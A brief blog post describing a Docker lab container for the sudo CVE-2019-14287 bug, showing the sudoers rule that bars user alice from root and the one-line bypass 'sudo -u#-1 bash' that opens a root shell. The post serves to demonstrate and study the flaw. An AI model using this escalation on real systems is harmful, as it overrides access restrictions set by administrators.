I wanted to experiment with the new Sudo security bug recently released (CVE-2019-14287), so I created a quick Docker container to spin up an environment with different users and a vulnerable version. I posted the code for this on github.
This container can be run with:
docker run -ti cashwilliams/cve-2019-14287-demo
The container has three real users:
The alice user is configured to have the ability to run any command as any other user (in this case bob as it is the only other user) using
sudo -u(user) (command), however is restricted from running commands as root. This is configured in the
/etc/sudoers file at the end using:
alice ALL=(ALL,!root) NOPASSWD: ALL
You can try to run commands as bob, such as opening a shell, with the following:
sudo -ubob bash
However, if you attempt to run a command as root, you will be prompted for a password which is unknown (and the command would fail anyway). This is by design and shows the sudo command working properly.
The "minus_1_uid" bug within sudo was published on October 14, 2019 and demonstrates an issue with how the user argument is interpreted.
In this case alice can run commands as the root user, such as opening a shell, with the following:
sudo -u#-1 bash